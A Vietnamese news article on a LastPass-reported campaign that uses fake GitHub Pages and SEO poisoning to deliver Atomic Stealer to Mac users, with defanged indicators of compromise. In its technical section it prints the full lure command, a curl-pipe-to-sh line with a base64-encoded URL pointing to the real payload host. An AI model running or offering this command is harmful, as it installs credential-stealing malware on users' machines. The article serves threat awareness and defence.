Một chiến dịch tấn công mạng tinh vi đang nhắm mục tiêu vào người dùng Mac thông qua các kho lưu trữ GitHub giả mạo. Các tác nhân đe dọa đang khai thác các chiến thuật tối ưu hóa công cụ tìm kiếm (SEO poisoning) để phân phối các liên kết độc hại trực tiếp đến các nạn nhân không nghi ngờ. Mục tiêu của chiến dịch này là triển khai mã độc Atomic Stealer khét tiếng.
Đội ngũ Tình báo, Giảm thiểu và Nâng cao Đe dọa của LastPass đã xác định một hoạt động infostealer (đánh cắp thông tin) đang diễn ra trên diện rộng. Hoạt động này đặc biệt nhắm vào người dùng macOS thông qua các trang GitHub Pages lừa đảo, được thiết kế để phát tán mã độc Atomic Stealer.
Chiến dịch Tấn công Mạng Lợi dụng GitHub và SEO Poisoning
Chiến dịch này thể hiện các kỹ thuật kỹ thuật xã hội nâng cao bằng cách tận dụng SEO poisoning. Điều này giúp đảm bảo các kho lưu trữ GitHub độc hại xuất hiện ở đầu kết quả tìm kiếm trên các nền tảng lớn như Google và Bing. Khi người dùng tìm kiếm phần mềm hợp pháp để tải xuống, họ sẽ gặp phải các kho lưu trữ trông giống như chính thức của công ty. Tuy nhiên, đây thực chất là những mặt tiền giả mạo được tạo ra bởi tội phạm mạng.
Mục tiêu và Kỹ thuật Lừa Đảo
Các tác nhân đe dọa đã giăng lưới rộng khắp, nhắm mục tiêu vào nhiều tổ chức lớn trên nhiều lĩnh vực. Điều này bao gồm các công ty công nghệ, tổ chức tài chính và dịch vụ quản lý mật khẩu. Chiến dịch sử dụng các trang GitHub giả mạo, thiết kế để trông giống như các trang tải xuống phần mềm hợp pháp. Những trang này được tối ưu hóa để xuất hiện cao trong kết quả tìm kiếm.
Chiến thuật lừa đảo dựa trên việc tạo ra một ấn tượng đáng tin cậy. Khi người dùng truy cập, họ tin rằng mình đang tương tác với nội dung từ các nhà cung cấp phần mềm uy tín. Tuy nhiên, hành động này thực chất dẫn họ đến việc tải xuống và cài đặt mã độc Atomic Stealer.
Phân Tích Kỹ Thuật Mã Độc Atomic Stealer
Các nhà nghiên cứu của LastPass đã phát hiện hai trang GitHub giả mạo dịch vụ của họ. Cả hai đều được tạo bởi người dùng “modhopmduck476” vào ngày 16 tháng 9. Các kho lưu trữ này có tiêu đề thuyết phục, kết hợp tên công ty và thuật ngữ dành riêng cho Mac. Các thuật ngữ như “MacOS”, “Mac” và “Premium on Macbook” được sử dụng để tối đa hóa sự hấp dẫn đối với đối tượng mục tiêu.
Các trang độc hại này bao gồm các liên kết tuyên bố cung cấp “Install LastPass on MacBook”. Những liên kết này chuyển hướng nạn nhân đến một trang dàn dựng thứ cấp tại “ahoastock825[.]github[.]io/.github/lastpass”. Đây là bước đầu tiên trong chuỗi phân phối phức tạp của mã độc Atomic Stealer.
Cơ Chế Phân Phối Đa Giai Đoạn
Cuộc tấn công sử dụng một cơ chế phân phối đa giai đoạn tinh vi. Nó bắt đầu khi nạn nhân truy cập trang GitHub giả mạo và được chuyển hướng đến “macprograms-pro[.]com/mac-git-2-download.html”. Trang thứ cấp này hướng dẫn người dùng sao chép và dán một lệnh terminal. Lệnh này khởi tạo một yêu cầu CURL đến một URL được mã hóa base64.
URL được mã hóa giải mã thành “bonoud[.]com/get3/install.sh”. Sau đó, script này tải một payload ngụy trang thành file “Update” vào thư mục tạm của hệ thống. Đây là một phương pháp phổ biến để tránh bị phát hiện và đảm bảo cài đặt mã độc Atomic Stealer thành công.
Ví dụ về lệnh CLI có thể được hướng dẫn cho nạn nhân:
curl -sL "$(echo "aHR0cHM6Ly9ib25vdWQuY29tL2dldDMvaW5zdGFsbC5zaA==" | base64 --decode)" | shTrong lệnh trên, chuỗi aHR0cHM6Ly9ib25vdWQuY29tL2dldDMvaW5zdGFsbC5zaA== là một ví dụ minh họa cho URL đã được mã hóa base64. Khi được giải mã, nó trỏ đến script cài đặt mã độc. Script này sau đó thực hiện việc tải xuống và cài đặt mã độc Atomic Stealer.
Nhận Diện Mã Độc và Tác Động
Mã độc này, được xác định là một trình thả Trojan trên macOS, nhất quán với phân tích về mã độc Atomic Stealer. Atomic Stealer nổi tiếng với khả năng đánh cắp nhiều loại thông tin nhạy cảm từ hệ thống bị nhiễm. Mục tiêu chính của mã độc Atomic Stealer là đánh cắp thông tin nhạy cảm, dẫn đến nguy cơ rò rỉ dữ liệu nghiêm trọng.
Các dữ liệu có nguy cơ bị đánh cắp bao gồm thông tin xác thực, dữ liệu tài chính, dữ liệu trình duyệt và các tệp cá nhân. Việc bị nhiễm mã độc Atomic Stealer có thể gây ra những hậu quả nghiêm trọng cho người dùng và tổ chức. Đây là một mối đe dọa đáng kể đối với an toàn thông tin cá nhân và doanh nghiệp.
Chỉ Số Nhận Diện (IOCs)
Các chỉ số nhận diện (Indicators of Compromise – IOCs) liên quan đến chiến dịch này bao gồm các tên miền và URL độc hại sau:
- Tên người dùng GitHub giả mạo:
modhopmduck476 - Trang dàn dựng thứ cấp:
ahoastock825[.]github[.]io/.github/lastpass - Trang phát tán mã độc:
macprograms-pro[.]com/mac-git-2-download.html - Máy chủ chứa payload cuối cùng:
bonoud[.]com/get3/install.sh
Việc theo dõi và chặn các IOC này là rất quan trọng để phòng ngừa và phát hiện các cuộc tấn công liên quan đến mã độc Atomic Stealer.
Phản Ứng và Biện Pháp Giảm Thiểu
Các đội ngũ bảo mật trên toàn ngành hiện đang tích cực giám sát các chỉ số xâm nhập liên quan đến chiến dịch này. LastPass đang dẫn đầu các nỗ lực gỡ bỏ các kho lưu trữ giả mạo nhắm vào khách hàng của họ. Công ty đã thành công trong việc gỡ bỏ các trang độc hại được xác định.
Ngoài ra, LastPass tiếp tục theo đuổi các hoạt động gián đoạn và chia sẻ tình báo về mối đe dọa với các tổ chức an ninh khác. Điều này nhằm chống lại bối cảnh đe dọa đang phát triển. Việc cập nhật bản vá bảo mật và thực hiện các biện pháp an ninh mạng mạnh mẽ là cần thiết để bảo vệ khỏi các cuộc tấn công tương tự.
